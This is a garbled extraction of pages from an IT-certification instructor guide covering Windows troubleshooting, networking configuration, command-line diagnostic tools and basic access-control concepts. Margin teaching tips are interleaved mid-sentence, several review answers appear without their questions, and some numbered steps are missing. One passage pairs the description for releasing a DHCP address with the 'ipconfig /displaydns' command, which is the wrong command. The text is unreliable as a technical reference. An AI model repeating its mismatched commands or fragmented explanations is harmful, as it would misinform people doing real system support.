440 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
Reinstalling Windows
If you do not have an up-to-date image, the last option is to reinstall Windows using
the Reset this PC option in the recovery environment.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 441
No OS Found
A no OS found type message can appear when a disk drive is identified as the boot
device but does not report the location of the OS loader. This could indicate a faulty
disk, so try running disk diagnostics (if available), and then use a recovery option to
run chkdsk.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
442 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
If the disk cannot be detected, enter system setup, and try modifying settings
(or even resetting the default settings). If the disk’s presence is reported by the
system firmware but Windows still will not boot, use a startup repair tool to open a
recovery mode command prompt, and use the bootrec tool to try to repair the
drive’s boot information.
• Enter bootrec /fixmbr to attempt repair of the MBR. Do not use this option
if the disk uses GPT partitioning.
You could also use diskpart to ensure that the system partition is marked as
active and that no other partitions have been marked as active.
Teaching
Delays affecting the system prior to sign-in are caused by loading drivers
Tip
and services. Quite often the culprit will be some type of network service or
configuration not working optimally, but there could be some sort of file corruption,
Discuss the complexity
of troubleshooting
too.
any issue where the If the system is slow to load the desktop following sign-in, the issue could be a
only symptom is
corrupt user profile. The registry settings file NTUSER.DAT is particularly prone
“slowness.” Encourage
students to think to this. Rebuilding a local user profile means creating a new account and then
about problem scope copying files from the old, corrupt profile to the new one, but excluding the
(one machine or following files: NTUSER.DAT, NTUSER.DAT.LOG, and NTUSER.INI.
multiple?).
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 443
7. If Windows displays an error message such as Low disk space, use Disk Clean-up
to delete unnecessary files. If the problem keeps recurring, check for any unusual
behavior by an application, such as excessive logging or temp file creation. If you
can rule out these as issues, the system will need additional storage.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
444 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
• Scan the computer for viruses and other malware, but also check the
configuration of antivirus software—While necessary to protect against
malware threats, security scanning software can reduce system performance.
Try disabling scanning temporarily to test whether performance improves. Make
sure the software is configured to exclude Windows system files it shouldn’t
scan, and configure any exceptions for software applications recommended by
the vendor. These typically include database files and the image files used for
virtual hard disks.
• Check for power management issues—If the user has been closing sessions
using sleep or hibernate, try restarting the computer. Verify that the system is
not operating in a power-saving mode (CPU throttling). Be aware that this might
have an underlying cause, such as overheating.
• Check fans and chassis vents for dust and clean if necessary.
• Make a note of the stop error code (which will be in the form: Stop: 0x0...), and
search the Microsoft Knowledge Base (support.microsoft.com/search) for known
fixes and troubleshooting tips. The various newsgroups accessible from this site
offer another valuable source of assistance.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 445
If the system auto restarts after a blue screen and you cannot read the error, open the
Advanced Options menu, and select the Disable automatic restarts option. This
option can also be set from Advanced System Properties > Startup and Recovery
Settings.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
446 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
USB Issues
If there are issues with USB devices not working after connection, not working after
the computer resumes from sleep/hibernation, or generating warning messages,
make sure the controllers are using the latest driver:
1. Use Windows Update or the vendor site to obtain the latest chipset or system
driver. There may also be a specific USB 3 host controller driver.
2. Use Device Manager to uninstall each USB host controller device, and then
reboot to reinstall them with the new driver.
3. If this does not resolve the issue, disable USB selective suspend power
management either for a specific port or device or system-wide.
A USB controller resource warning indicates that too many devices are connected
to a single controller. This typically occurs if you use an unpowered USB hub to
expand the number of ports available and connect more than five devices to a
single controller. If updating the chipset drivers doesn’t resolve the issue, try the
following:
1. Connect the hub to a USB 2 port rather than a USB 3 port. While USB 3 is
higher bandwidth, in some chipset implementations each controller supports
fewer device connections (endpoints). Use the hub to connect low-bandwidth
input/output devices over USB 2, and reserve use of USB 3 ports for external
disks and network adapters.
2. Reduce the number of devices to see if that solves the problem. If it doesn’t,
test to see if one device is the source of the errors.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 447
• Verify that disabling one service has not inadvertently affected others—Some
services cannot start until a dependent service is running.
• Make sure that the service has sufficient privileges—Services depend on account
permissions to run. Check that the service is associated with a valid user or
system account and that the password configured for the account is correct.
• If a core Windows service is affected, check system files, and scan the disk for
errors and malware.
Time Drift
Processes such as authentication and backup depend on the time reported
by the local PC being closely synchronized to the time kept by a server. Some
authentication systems are intolerant of 30 or 60 second discrepancies.
Each PC motherboard has a battery-powered real time clock (RTC) chip, but this
is not a reliable authoritative time source. Relying on the internal time can lead to
servers and clients drifting out of sync, especially if some of the clients access the
network remotely. Servers and clients can also be configured to use Internet time
sources, but if some clients are remote, they may be set to use different sources
than the network servers.
Ideally, the network services should be configured in a domain and use either GPS-
synchronized time sources or a pool of Internet time sources. Sampling from a pool
helps to identify and resolve drifts. The clients can then be configured to use the
servers as authoritative time sources.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
448 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
Review Activity:
Windows OS Problems
5
Teaching 1. A user calls saying that their screen occasionally goes blue, and the
Tip system shuts down. What should you advise the user to do?
Take some time at
the end of each topic Record as much information from the user’s blue screen as possible, especially the
to answer questions. STOP error number, so that you can research the error.
You can use the
review questions 2. A program is continually using 99–100% of processor time. What should
for discussion in you do?
class or set them for
students to complete Try to end the application or the process using Task Manager, and then contact the
individually during or
after class.
application vendor to find out why the problem is occurring.
3. You are assisting a user whose application is in the state shown in the
exhibit. How would you troubleshoot this problem?
The user will be concerned about losing any unsaved work. Ask the user to describe
what he or she was doing at the time of the crash to try to diagnose what might
have caused it. Give the program a few minutes to finish processing—check Task
Manager for ongoing disk activity. If the application does not start responding,
check autosave and temp folders for a recent copy of the file data. Use Task
Manager to end the process. Restart the application, and try to open any file
data you might have recovered. Check the log files and online resources to try to
diagnose the cause of the crash. If the problem persists, consider solutions such as
disabling add-ons or reinstalling. Demonstrate to the user how to set up autosave
(if it is not already configured) and how to save regularly.
Lesson 13: Supporting Windows | Topic 13C
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 449
Boot using a recovery tool, such as the product disc, and attempt startup repair
and/or repair of the Windows installation using sfc or Windows reset.
Run a Memory Diagnostic. Because this tests each RAM cell, it should uncover any
fault.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
450 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
Lesson 13
Summary
6
Show You should be able to support diverse operating system and application software
Slide(s) deployments by applying appropriate considerations and troubleshooting processes.
Summary
Guidelines for Supporting Windows
Teaching
Follow these guidelines to support and troubleshoot Windows deployments,
Tip
upgrades, and app software:
Try to include some
time at the end • Develop a checklist and work instructions to govern deployment of clean install
of each lesson to of new operating systems:
check students’
understanding and • Boot methods for attended (USB external drive versus optical media) and
answer questions. unattended (USB/disk versus remote network installation).
• Partitioning (MBR versus GPT) and file system requirements for drive
formatting or image-based installation.
• Considerations (backup files and user preferences, app and driver support/
backward compatibility, and hardware compatibility).
• Establish system requirements for applications (CPU, 32-bit vs. 64-bit, RAM,
dedicated graphics card vs. integrated, VRAM, storage, and external hardware
tokens).
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 451
Additional practice questions for the topics covered in this lesson are available on the
CompTIA Learning Center.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
Lesson 14
Managing Windows Networking
1
LESSON INTRODUCTION
As a CompTIA A+ technician, your duties will include setting up and configuring Show
computers so that they can connect to a network. By installing, configuring, and Slide(s)
troubleshooting networking capabilities, you will be able to provide users with the Objectives
connectivity they need to be able to perform their job duties.
Teaching
Once you have the computer network up and running, you can start to configure
Tip
it to provide useful services. File and print sharing are key uses of almost every
network. When configuring these resources, you must be aware of potential The Windows
networking topics
security issues and understand how to set permissions correctly to ensure that data covered in this lesson
is only accessible to those users who really should have been authorized to see it. include adapter/
connection types
Along with permissions, you will also need to manage user accounts on networks.
and configuration,
Windows networks can use local accounts within workgroups or centralized Active command-
Directory accounts on a domain network. In this lesson, you will learn some basic line network
principles for managing users in both types of environments. troubleshooting tools,
and domain- and
resource-sharing
Lesson Objectives concepts.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
454 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
Topic 14A
Show
Slide(s)
Manage Windows Networking
Manage Windows
2
Networking
CORE 2 EXAM OBJECTIVES COVERED
Teaching 1.6 Given a scenario, configure Microsoft Windows networking features on a
Tip client/desktop.
This topic focuses on
adapter/connection
types. If you have not
Windows supports many types of network connection, from wired and wireless
completed Core 1, you adapters to using cellular radios or remote links. While they use different
might need to spend underlying hardware and signaling methods, each needs to be configured with
extra time explaining standard protocols, clients, and services. In this topic you will learn how to configure
IP and DNS concepts. properties for each of these network connection types.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 455
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
456 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
IP Addressing Schemes
Show Device Manager properties are for the adapter’s low-level network link (Ethernet
Slide(s) or Wi-Fi). To connect to a network, the logical adapter must have a valid client
IP Addressing network configuration. Each adapter must be configured with client software and
Schemes allocated an appropriate IP address and subnet mask.
• In IPv6, the address is 128 bits long and the interface address portion is always
the last 64 bits. Network prefixes are used to identify logical networks within the
first 64 bits.
All hosts on the same local network must use addresses from within the same
range. Hosts with addresses in different ranges can only be contacted by
forwarding the packet via a router. Each host must be configured with the IP
address of a local router. This is referred to as the default gateway.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 457
The router interface is usually assigned the first available value. For example, if the IP
address scheme is 192.168.1.0/24, the first available host address is 192.168.1.1.
Typically, a host is also configured with the addresses of Domain Name System
(DNS) servers that can resolve requests for name resources to IP addresses, making
identification of hosts and services simpler.
On a home network, the router is usually configured to forward DNS queries, so the
gateway and primary DNS server parameters for client PCs will usually be set to the
same value.
As well as DNS servers, the host might be configured with a domain suffix to identify its
fully qualified domain name (FQDN) on the local network. For example, if attached to a
network identified as ad.company.example, the FQDN of PC1 will be PC1.ad.company.
example.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
458 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
Ethernet Properties dialog (left) and Internet Protocol Version 4 (TCP/IPv4) Properties dialog (right).
(Screenshot courtesy of Microsoft.)
You can also adjust the IP configuration via the settings app. In this dialog, you need
to enter the mask as a prefix length in bits. A 255.255.255.0 mask is 24 bits.
Using Network & Internet settings to configure static addressing. In this dialog, you need to enter
the mask as a prefix length rather than a dotted decimal mask. (Screenshot courtesy of Microsoft.)
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 459
Network Location
Each network connection is governed by the local OS firewall settings imposed by Show
Windows Defender Firewall. Slide(s)
When you connect to a new network, the Network Location Awareness Network Location
(NLA) service prompts you to set the network type. If the network type is set
Teaching
as Public, Windows Firewall is configured to block all access and make the host
Tip
undiscoverable. If the network is set as Private, the firewall settings allow host
discovery and folder/printer sharing. Explain the difference
between public and
private networks and
the effect on firewall
settings (optionally,
also mention domain
networks). We will be
covering Windows
Firewall in more
detail later, so only
summarize here.
There is also a Domain profile. You cannot choose this option, but if the computer is
joined to a domain, then the firewall policy will be configured via Group Policy.
Use Network & Internet settings to change the location defined for a network.
Using Network & Internet settings to change the network profile. (Screenshot courtesy of Microsoft.)
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
460 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
With network discovery enabled, other computers and devices can be accessed
via the Network object in File Explorer. Windows uses a system called universal
naming convention (UNC) syntax to address network hosts and resources. The
syntax for a UNC network path is \\Host\Path, where Host is the host name,
FQDN, or IP address of the server and Path is a shared folder or file path.
Setting the firewall state via the Windows Security Center. (Screenshot courtesy of Microsoft.)
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 461
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
462 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
Teaching A virtual private network (VPN) connects the components and resources of two
Tip (private) networks over another (public) network. A VPN is a “tunnel” through the
Internet (or any other public network). It uses special connection protocols and
Discuss the
requirements for encryption technology to ensure that the tunnel is secure and that the user is
configuring these properly authenticated. Once the connection has been established, to all intents
adapter types. Note and purposes, the remote computer becomes part of the local network (though it is
the options for still restricted by the bandwidth available over the WAN link).
defining a metered
connection. Windows supports several VPN types. If the VPN type is supported, you can
configure a connection using the Windows client from Network & Internet settings.
Some VPNs might require use of third-party client software.
Subsequently, the network connection will be available via the network status icon.
Right-click the icon and select the VPN connection icon to Connect or Disconnect
or modify the connection’s Properties.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 463
The WWAN adapter can be fitted as a USB device or as an internal adapter. For GSM
and 4G or 5G services, the adapter must also be fitted with a subscriber identity
module (SIM) card issued by the network provider. You can enable or disable the
connection using the network status icon and configure it via Network & Internet
settings.
Cellular providers can impose high charges if the subscriber’s data allowance is
exceeded. You can define the network type as metered and set a data limit within
Windows to avoid the risk of exceeding the provider’s cap. You can also monitor
data usage by each app.
Proxy Settings
Some networks use a proxy to provide network connectivity. A proxy server can Show
improve both performance and security. Client PCs pass Internet requests to the Slide(s)
proxy server, which forwards them to the Internet. The proxy may also cache pages
Proxy Settings
and content that is requested by multiple clients, reducing bandwidth.
Teaching
Tip
Recap the function of
a proxy server from
Core 1, and show how
to configure address
information for a non-
transparent proxy.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
464 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
An intercepting or transparent proxy does not require any client configuration and
some proxies are autoconfiguring. If neither of these cases apply, each client must
be configured with the IP address and TCP port to use to forward traffic via the
proxy. These proxy settings are configured via Network & Internet settings.
Using the Settings app to apply a manual proxy setup. (Screenshot courtesy of Microsoft.)
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 465
Review Activity:
Windows Networking
3
1. You are assisting a user with configuring a static IP address. The user has Teaching
entered the following configuration values and now cannot access the Tip
Internet. Is there a configuration issue or a different problem? Take some time at
the end of each topic
• IP: 192.168.1.1 to answer questions.
You can use the
• Mask: 255.255.255.0 review questions
for discussion in
• Gateway: 192.168.1.0 class or set them for
students to complete
• DNS: 192.168.1.0 individually during or
after class.
There is a configuration problem. 192.168.1.0 is not a host address. With the subnet
mask 255.255.255.0, it identifies the network range as 192.168.1.0/24. The gateway
is usually configured as the first available host address in this range: 192.168.1.1.
The DNS server should also be set to 192.168.1.1.
The Network & Interface settings Edit IP settings dialog can be used. 255.255.255.0
is the subnet mask in dotted decimal format. The dialog just requires the number of
mask bits. Each “255” in a dotted decimal mask represents 8 bits, so the user should
enter 24.
3. You are supporting a user who has just replaced a wireless router. The
user has joined the new wireless network successfully but can no longer
find other computers on the network. What should you check first?
Use Network & Internet to check the network profile type. When the network
changed, the user probably selected the wrong option at the prompt to allow the
PC to be discoverable, and the profile is probably set to Public. Change the type
Private.
False. It is not usually a good idea to do so, but it can be disabled via Security Center
or the Control Panel applet.
You must also input the fully qualified domain name (FQDN) or IP address of the
remote access VPN server.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
466 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
Topic 14B
Show
Slide(s)
Troubleshoot Windows Networking
Troubleshoot
6
Windows Networking
CORE 2 EXAM OBJECTIVES COVERED
Teaching 1.2 Given a scenario, use the appropriate Microsoft command-line tool.
Tip
This topic focuses
on the command-
If a host does not have an appropriate IP configuration for the network that it is
line network
troubleshooting tools. connected to, it will not be able to communicate with other hosts or access the
Internet, even if the physical connection is sound. There are a number of command-
line tools for testing and troubleshooting the IP configuration.
Troubleshoot IP Configuration
Show Windows can report several types of error state for a local network adapter. If
Slide(s) the connection is reported as unplugged or disconnected, you need to check the
Troubleshoot IP cable or wireless network configuration. Two other states are reported if the link is
Configuration available, but IP is not correctly configured:
• Limited connectivity—The adapter is set to obtain an address automatically,
but no DHCP server can be contacted. The adapter will either use an address
from the automatic IP addressing (APIPA) 169.254.x.y range or will use an
address specified as an alternate configuration in IPv4 properties.
• No Internet access—This means that the IP configuration is valid for the local
network but that Windows cannot identify a working Internet connection.
Windows tests Internet access by attempting a connection to www.
msftncsi.com and checking that DNS resolves the IP address correctly. This
state could indicate a problem with the router, with DNS, or with both.
ipconfig Command
Used without switches, ipconfig displays the IP address, subnet mask, and
default gateway (router) for all network adapters to which TCP/IP is bound. The /
all switch displays detailed configuration, including DHCP and DNS servers, MAC
address, and NetBIOS status. ipconfig can resolve the following questions:
• Is the adapter configured with a static address? If so, are the parameters (IP
address, subnet mask, default gateway, and DNS server) correct, given the local
network’s IP range?
• Is the adapter configured by DHCP?
• If so, is there a valid lease? If a DHCP server cannot be contacted, there may
be some wider network problem.
• If there is an address lease, are the parameters correct for the local network?
If the DHCP server is misconfigured, the host configuration might not be
appropriate.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 467
If a DHCP lease is missing or incorrect, you can use ipconfig to request a new one.
• Release the IP address obtained from a DHCP server so that the network
adapter(s) will no longer have an IP address:
ipconfig /displaydns
• Clears the DNS resolver cache. If cached records are out-of-date, it can cause
problems accessing hosts and services:
ipconfig /flushdns
hostname Command
The hostname command returns the name configured on the local machine.
If the machine is configured as a server, client machines will need to use the
hostname to access shared folders and printers.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
468 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
Network Reset
If there are persistent network problems with either a client or a server, one “stock”
response is to try restarting the computer hardware. You can also try restarting just
the application service.
Do not restart a server without considering the impact on other users. A restart is
probably only warranted if the problem is widespread.
Another option is to reset the network stack on the device. In Windows, this will
clear any custom adapter configurations and network connections, including VPN
connections. These will have to be reconfigured after the reset. The Network reset
command is on the Settings > Network & Internet > Status page.
2. Ping the IP address of your workstation to verify it was added correctly and to
check for possible duplicate IP addresses.
3. Ping the IP address of the default gateway to verify it is up and running and
that you can communicate with a host on the local network.
4. Ping the IP address of a remote host to verify you can communicate through
the router.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 469
Troubleshooting with ping. These tests show that IP is correctly installed, that the host responds
to its own IP address, that the default gateway is available, and that a host on the Internet can
be contacted. Note that only contacting the Internet host (8.8.8.8) incurs any latency. (Screenshot
courtesy of Microsoft.)
If ping is successful, it responds with the message Reply from IP Address and the
time it takes for the host’s response to arrive. The millisecond (ms) measures of
round-trip time (RTT) can be used to diagnose latency problems on a link.
If ping is unsuccessful, one of three messages are commonly received:
• Reply from SenderIP Destination unreachable—If both hosts are suppose to
be on the same local network segment, this means that the sending host gets no
response to Address Resolution Protocol (ARP) probes. ARP is used to locate the
hardware or media access control (MAC) address of the interface that owns an
IP address. The most likely cause is that the destination host is disconnected or
configured as non-discoverable. If you can confirm that the host is up, this could
indicate some sort of IP misconfiguration, such as duplicate addresses or an
incorrect subnet mask.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
470 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
Examples of error messages using ping. The first probe is for an IP address on the local network.
The sending host (192.168.1.100) reports “destination host unreachable” because no host with the
IP address 192.168.1.101 responds to ARP probes. The second probe is for a host on a different
network (192.168.0.0/24 rather than 192.168.1.0/24). (Screenshot courtesy of Microsoft.)
You can also ping DNS names (ping comptia.org, for example) or FQDNs
(ping sales.comptia.org, for instance). This will not work if a DNS server
is unavailable.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 471
Using tracert in Windows. The first probe is for the host’s default gateway (a SOHO router
appliance). The second probe is to Google’s public DNS resolver. The hops take the packet from the
local gateway via an ISP’s network to Google’s Internet routers and servers. Note that probes to one
of the routers have timed out. This does not mean that the connection failed, just that the router is
configured not to respond to probes. (Screenshot courtesy of Microsoft.)
If the host cannot be located, the command will eventually timeout, but it will return
every router that was attempted. The output shows the number of hops (when a
packet is transferred from one router to another), the ingress interface of the router
or host (that is, the interface from which the router receives the probe), and the
time taken to respond to each probe in milliseconds (ms). If no acknowledgement is
received within the timeout period, an asterisk is shown against the probe.
As an alternative to tracert, pathping command performs a trace and then pings
each hop router a given number of times for a given period to determine the round-
trip time (RTT) and measure link latency more accurately. The output also shows
packet loss at each hop.
If there is a routing issue, check that the local router’s Internet connection status
is OK. If the router is connected, locate your ISP’s service status page or support
helpline to verify that there are no wider network issues or DNS problems that
might make your Internet connection unavailable. If there are no ISP-wide issues,
try restarting the router.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
472 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
• Name resolution—If a service such as DNS is not working, you will be able to
connect to servers by IP address but not by name.
Using nslookup to query the mail server configured for the comptia.org domain name using
Google’s public DNS servers (8.8.8.8). (Screenshot courtesy of Microsoft.)
If you query a different name server, you can compare the results to those returned
by your own name server. This might highlight configuration problems.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 473
Displaying listening connections and the processes that opened each port with netstat. The results
here are mostly opened by Windows services, but note that last line. The Java runtime environment
has opened a TCP port. If you use an online resource to gather information about that port, you
will find that it is associated with running a Minecraft server. Ports and services that are opened
without authorization can pose a high security risk. Even when they are authorized, these services
must be monitored and patched against vulnerabilities. (Screenshot courtesy of Microsoft.)
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
474 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
Review Activity:
Windows Networking
7
Teaching 1. A DHCP server has been reconfigured to use a new network address
Tip scheme following a network problem. What command would you use to
Take some time at refresh the IP configuration on Windows client workstations?
the end of each topic
to answer questions. ipconfig /renew
You can use the
review questions 2. A computer cannot connect to the network. The machine is configured
for discussion in to obtain a TCP/IP configuration automatically. You use ipconfig to
class or set them for
students to complete
determine the IP address and it returns 0.0.0.0. What does this tell you?
individually during or
after class.
This is an irregular state for a Windows PC. If a DHCP server cannot be contacted,
the machine should default to using an APIPA address (169.254.x.y). As it has
not done this, something is wrong with the networking software installed on the
machine. The best option is probably to perform a network reset via the Settings >
Network & Internet > Status page.
No. The hosts are on the same IP network (192.168.0.0/24). This means that
192.168.0.200 does not try to use a router (the gateway) to send the probes.
192.168.0.200 uses address resolution protocol (ARP) to find the host with the IP
192.168.0.99. The host unreachable message indicates that there was no response,
but the problem will be an issue such as the host being disconnected from the
network or configured to block discovery rather than a gateway issue.
4. You are checking that a remote Windows workstation will be able to dial
into a web conference with good quality audio/video. What is the best
tool to use to measure latency between the workstation’s network and
the web conferencing server?
pathping measures latency over a longer period and so will return a more accurate
measurement than the individual round trip time (RTT) values returned by ping or
tracert.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 475
This is output from netstat. The -n switch has been used to show ports in numeric
format and the -o switch to show the PID of the process that opened the port.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
476 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
Topic 14C
Show
Slide(s)
Configure Windows Security Settings
Configure Windows
6
Security Settings
CORE 2 EXAM OBJECTIVES COVERED
Teaching 1.2 Given a scenario, use the appropriate Microsoft command-line tool.
Tip 2.1 Summarize various security measures and their purposes.
This topic focuses on 2.5 Given a scenario, manage and configure basic security settings in the Microsoft
authentication and Windows OS.
authorization. It covers
most logical security Logical access controls ensure that each user is identified and authenticated before
and most Active
being allowed to use a host or network services. Supporting an access control
Directory examples
from objective 2.1 system means defining strong authentication methods and using security groups
(summarize security to assign permissions to users. On a network, you can use a directory to simplify
measures) plus management of these controls. This topic will help you to understand and apply
Windows login options these configurations so that you can help to support both workgroup and domain
from objective 2.5 networks.
and some more of
the command-line
tools from 1.2 (net Logical Security Controls
user, gpresult, and
gpupdate). A security control is a safeguard or prevention method to avoid, counteract, or
minimize risks relating to personal or company property. For example, a firewall is
Show
a type of security control because it controls network communications by allowing
Slide(s)
only traffic that has specifically been permitted by a system administrator. There
Logical Security are many ways of classifying security controls, but one way is to class them as
Controls physical, procedural, or logical:
Teaching • Physical controls work in the built environment to control access to sites.
Tip Examples include fences, doors, and locks.
Explain that logical
security refers to OS/ • Procedural controls are applied and enforced by people. Examples include
software mechanisms incident response processes, management oversight, and security awareness
to enforce access training programs.
controls.
Distinguish the
• Logical controls are applied and enforced by digital or cyber systems and
functions of software. Examples include user authentication, antivirus software, and firewalls.
authentication and
authorization in an One of the cornerstones of logical security is an access control system. The overall
access control system. operation of an access control system is usually described in terms of three
functions, referred to as the AAA triad:
• Authentication means that everything using the system is identified by an
account and that an account can only be operated by someone who can supply
the correct credentials.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 477
Implicit Deny
ACL security is typically founded on the principle of implicit deny. Implicit deny
means that unless there is a rule specifying that access should be granted, any
request for access is denied. This principle can be seen clearly in firewall policies. A
firewall filters access requests using a set of rules. The rules are processed in order
from top to bottom. If a request does not fit any of the rules, it is handled by the
last (default) rule, which is to refuse the request.
Least Privilege
A complementary principle to implicit deny is that of least privilege. This means
that a user should be granted the minimum possible rights necessary to perform
the job. This can be complex to apply in practice, however. Designing a permissions
system that respects the principle of least privilege while not generating too many
support requests from users is a challenging task.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
478 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
Security Groups
A security group is a collection of user accounts. Security groups are used when
assigning permissions and rights, as it is more efficient to assign permissions to a
group than to assign them individually to each user. You can set up a number of
custom groups with least privilege permissions for different roles and then make
user accounts members of the appropriate group(s).
Built-in groups are given a standard set of rights that allow them to perform
appropriate system tasks.
• A user account that is a member of the Administrators group can perform
all management tasks and generally has very high access to all files and other
objects in the system. The local or Microsoft user created during setup is
automatically added to this group. Other accounts should not routinely be
added to the Administrators group. It is more secure to restrict membership of
the Administrators group as tightly as possible.
• The Guest group is only present for legacy reasons. It has the same default
permissions and rights as the User group.
The Guest user account is disabled by default. Microsoft ended support for using the
Guest account to login to Windows in a feature update. The Guest account is only used
to implement file sharing without passwords.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 479
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
480 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
• Tasks that are protected by UAC are shown with a Security Shield icon:
• If the logged in account is already an administrator, the user must still click
through the consent dialog.
UAC requiring confirmation of the use of administrator privileges. This account is an administrator,
so only a confirmation is required—no credentials have to be supplied.
(Screenshot courtesy of Microsoft.)
UAC protects the system from malware running with elevated administrator
privileges. This is a good thing, but if you need to perform numerous system
administration tasks at the same time, UAC can prove frustrating. You can configure
UAC notifications to appear more or less frequently by using the configuration
